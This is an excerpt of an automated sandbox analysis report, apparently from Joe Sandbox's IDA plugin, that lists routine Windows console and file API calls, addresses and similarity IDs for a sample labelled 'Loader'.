• WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 011CCDC8
• GetLastError.KERNEL32 ref: 011CCE6B
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
• String ID:
• API String ID: 2112829910-0
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
APIs
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,011CDA60,00000000,00000001,00000000,?,?,011CCEBF,?,00000000,00000000), ref: 011CE2BD
• GetLastError.KERNEL32(?,011CDA60,00000000,00000001,00000000,?,?,011CCEBF,?,00000000,00000000,?,?,?,011CD462,00000000), ref: 011CE2C9
  • Part of subcall function 011CE28F: CloseHandle.KERNEL32(FFFFFFFE,011CE2D9,?,011CDA60,00000000,00000001,00000000,?,?,011CCEBF,?,00000000,00000000,?,?), ref: 011CE29F
• ___initconout.LIBCMT ref: 011CE2D9
  • Part of subcall function 011CE251: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,011CE280,011CDA4D,?,?,011CCEBF,?,00000000,00000000,?), ref: 011CE264
• WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,011CDA60,00000000,00000001,00000000,?,?,011CCEBF,?,00000000,00000000,?), ref: 011CE2EE
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
APIs
• EncodePointer.KERNEL32(00000000,?), ref: 011C6774
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_ef0000_Loader.jbxd
Similarity
• API ID: EncodePointer
• String ID: MOC$RCC
• API String ID: 2118026453-2084237596
Memory Dump Source
• Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Loader.jbxd
Similarity
• API ID: MetricsSystem
• String ID:
• API String ID: 4116985748-3916222277